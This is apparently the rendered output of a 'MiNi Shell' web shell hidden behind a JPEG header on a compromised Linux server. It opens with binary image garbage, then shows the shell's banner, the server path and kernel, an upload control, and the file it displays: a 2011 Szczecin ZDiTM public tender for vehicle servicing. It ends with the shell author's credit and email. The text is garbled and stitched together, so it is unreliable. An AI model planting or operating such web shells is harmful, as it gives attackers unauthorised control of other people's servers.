JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/388266-N-2011.html

<p class="kh_header"><b>Szczecin: Naprawy, konserwacje, przeglądy techniczne samochodów ZDiTM w Szczecinie</b><br>
<b>Numer ogłoszenia: 388266 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 091 4800444,4800434, faks 091 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy, konserwacje, przeglądy techniczne samochodów ZDiTM w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawa samochodów służbowych ZDiTM w Szczecinie w zakresie wykonywania czynności pogwarancyjnych, przeglądów technicznych okresowych oraz wymiany uszkodzonych części zamiennych oraz usuwania uszkodzeń pojazdów  wynikających z bieżącej eksploatacji pojazdu, zagrażających bezpieczeństwu użytkownika, których konieczność wykonania stwierdzono w trakcie przeglądu lub naprawy.
2)    Dotyczy I i II części zamówienia :
          1) Zakres naprawy pojazdów będzie obejmował min. następujące czynności - układy:
   - diagnostyka komputerowa silnika i jego układów;
   - diagnostyka poduszek i kurtyn powietrznych;
   - naprawa instalacji elektrycznej pojazdu wraz z podzespołami, regulacje;
   - naprawa układu kierowniczego;
   - naprawa układu hamulcowego;
   - naprawa silnika i jego osprzętu;
   - naprawa układu zasilania paliwem i powietrzem;
   - naprawa układu przeniesienia mocy;
   - naprawa zawieszenia pojazdu (określenie stopnia zużycia amortyzatorów);
   - naprawa klimatyzacji;
   - wymiana klamek, zawiasów, rolek przesuwnych drzwi;
   - diagnostyka pojazdu bez przeprowadzenia remontu;
   - naprawa dostarczonych podzespołów:
   - wykonywanie okresowych przeglądów technicznych.
3)   Usługi przeglądu technicznego okresowego i naprawy wykonywane będą na podstawie  każdorazowego zlecenia składanego przez upoważnionego pracownika Zamawiającego.
4)  Wykonawca ma obowiązek dokonywania napraw i konserwacji przy użyciu części oryginalnych. W przypadku części nieoryginalnych, parametry materiałów eksploatacyjnych i części stosowanych w czasie przeglądów oraz napraw muszą odpowiadać parametrom materiałów eksploatacyjnych i części zalecanych przez producenta samochodów.
5)   W przypadku przeglądów okresowych zakres wykonanych prac musi być zgodny z wykazem czynności wyszczególnionych w książce pojazdu, stosownie do jego przebiegu.
6)  Wykonawca udziela gwarancji na części (z wyłączeniem przynależnych do grupy jednorazowego użytku) oraz na jakość dokonywanych czynności wchodzących w zakres  przeglądów technicznych i napraw, której bieg rozpoczyna się od dnia odbioru samochodu z naprawy lub przeglądu. Czynność ta będzie potwierdzona protokołem odbioru podpisanym przez obie strony.
7)  Wymagany przez Zamawiającego minimalny okres gwarancji :
   a)   na robociznę - min. 3 miesiące od dnia odbioru pojazdu,
   b) na zainstalowane części - okres gwarancji dla nowych części odpowiada okresom gwarancji 
         określonym przez producenta, jednak okres ten nie może być krótszy niż 6 miesięcy od daty ich  
          montażu.
c)  warunkiem obowiązywania gwarancji jest przestrzeganie zasad prawidłowej eksploatacji pojazdów   
   określonych w instrukcji obsługi oraz wykonywania okresowych przeglądów gwarancyjnych.
d)  w przypadku wystąpienia wad lub usterek Wykonawca zobowiązany jest niezwłoczni przystąpić do ich usunięcia. Zamawiający wyznaczy technicznie uzasadniony termin  usunięcia wad lub usterek w porozumieniu z Wykonawcą.
e)  o stwierdzonych usterkach lub wadach Zamawiający poinformuje Wykonawcę niezwłocznie, nie później niż w terminie 3 dni od daty ich ujawnienia, za pomocą faksu lub poczty e-mail.
   f)  wszelkie koszty związane z usuwaniem wad lub usterek w okresie udzielonej gwarancji ponosi     
    Wykonawca.
8)  Wykonawca zobowiązany jest do prowadzenia książki przeglądów technicznych okresowych dla każdego pojazdu oddzielnie.
9)    Wykonawca zapewnia holowanie z miejsca awarii na terenie miasta Szczecina do warsztatu :
                   a) w okresie gwarancyjnym na własny koszt i własne ryzyko,
                   b) w okresie pogwarancyjnym - na koszt Zamawiającego.
10)  Stacja obsługi (warsztat) winien być otwarty w systemie dwu-zmianowym, od poniedziałku do  
     piątku) oraz w systemie jedno- zmianowym w soboty.
11) Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć normy czasu naprawy  
     samochodów określający normy czasochłonności dla usług serwisu i naprawy pojazdów.
12) Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię  
      umowy na utylizację olejów i filtrów.
13)   Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię umowy na neutralizację akumulatorów oraz ogumienia lub oświadczenie że akumulatory i ogumienie odbierane są przez dostawcę, który przy dostawie nowych zabiera zużyte.
14)   Cena usługi zostanie określona w oparciu o koszt robocizny, (określony na podstawie wskazanej przez Wykonawcę w ofercie ceny za 1 roboczogodzinę i czasochłonności wykonania usługi) oraz koszt materiałów (części) użytych do wykonania usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0, 50.11.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki dotyczące dysponowania odpowiednim potencjałem technicznym poprzez wykazanie że :
Część I zamówienia :   
Wykonawca dysponuje lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) w odległości do 10 km od siedziby Zamawiającego wyposażonym w:
1) stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego,  
      oświetlenia oraz zawieszenia, 
2)   stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego, 
3)   co najmniej 2 kanały obsługowe.
 
Część II zamówienia :   
Wykonawca dysponuje lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) w odległości do 10 km od siedziby Zamawiającego wyposażonym w:
1) stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego,  
      oświetlenia oraz zawieszenia, 
2)   stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego, 
3)   co najmniej 1 kanał obsługowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy:
1)	wystąpi konieczność zmiany siedziby, NIP, REGON,
2)	wystąpi okoliczność niezależna od Wykonawcy (np. sprowadzenie części), które nie pozwalają na dotrzymanie terminu o którym mowa w § 3 pkt 5 niniejszej umowy.
3)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
4)	wystąpi ustawowa zmiana stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, pokój 318 , III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, sekretariat ZDiTM, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia  - 20 samochodów osobowo-dostawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawa samochodów służbowych ZDiTM w Szczecinie w zakresie wykonywania czynności pogwarancyjnych, przeglądów technicznych okresowych oraz wymiany uszkodzonych części zamiennych oraz usuwania uszkodzeń pojazdów 
Część I zamówienia  - 20 samochodów osobowo-dostawczych :

Lp.	Marka pojazdu	Nr rejestracyjny	Nr boczny	Rok. Produkcji
1	HYUNDAI	ZS 7908 M	D-08	2008
2	FIAT PANDA	ZS 79210	D-10	2003
3.	FIAT PANDA 	ZS 99616	D-16	2004
4	KIA	ZS 6820M	D-20	2008
5	FIAT DOBLO CARGO	ZS 9726N	D-26	2008
6	FIAT DOBLO CARGO	ZS 7325N	D-25	2008
7	FIAT ALBEA	ZS 99603	D-31	2004
8	LANOS	ZS 15334	D-01	2000
9	FIAT PANDA	ZS 99602	D-02	2004
10	HYUNDAI	ZS 9709L	D-09	2008
11	FIAT PANDA	ZS 79211	D-11	2003
12	FIAT PANDA	ZS 79212	D-12	2003
13	FIAT PANDA	ZS 79213	D-13	2003
14	FIAT PANDA	ZS 99614	D-14	2004
15	FIAT PANDA	ZS 99615	D-15	2004
16	FIAT PANDA	ZS 99617	D-17	2004
17	FIAT PANDA	ZS 5318T	D-18	2009
18	FIAT PANDA	ZS 9022N	D-22	2008
19	FIAT PANDA	ZS 79205	D-35	2003
20	FIAT PANDA	ZS 99619	D-19	2004
2. Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie dłuższym niż 3 dni robocze od daty przekazania pojazdu.
3. Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) w odległości do 10 km od siedziby Zamawiającego wyposażoną w:
1)stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia, 
2)stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego, 
3)co najmniej 2 kanały obsługowe,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia - 4 samochodów ciężarowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawa samochodów służbowych ZDiTM w Szczecinie w zakresie wykonywania czynności pogwarancyjnych, przeglądów technicznych okresowych oraz wymiany uszkodzonych części zamiennych oraz usuwania uszkodzeń pojazdów  wynikających z bieżącej eksploatacji pojazdu, zagrażających bezpieczeństwu użytkownika, których konieczność wykonania stwierdzono w trakcie przeglądu lub naprawy.
Lp.	Marka pojazdu	Nr rejestracyjny	Nr boczny	Rok. Produkcji
1	STAR 1142	ZS 18067	D-24	1998
2	FORD TRANSIT	ZS 2421M	D-21	2007
3.	FORD TRANSIT	ZS 0729T	D-29	2010
4	RENAULT	ZS 1927S	D-27	2008
2.Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie dłuższym niż 5 dni roboczych od daty przekazania pojazdu.
3. Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) w odległości do 10 km od siedziby Zamawiającego wyposażoną w:
1)stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego,  oświetlenia oraz zawieszenia, 
2) stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego, 
3) co najmniej 1 kanał obsługowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com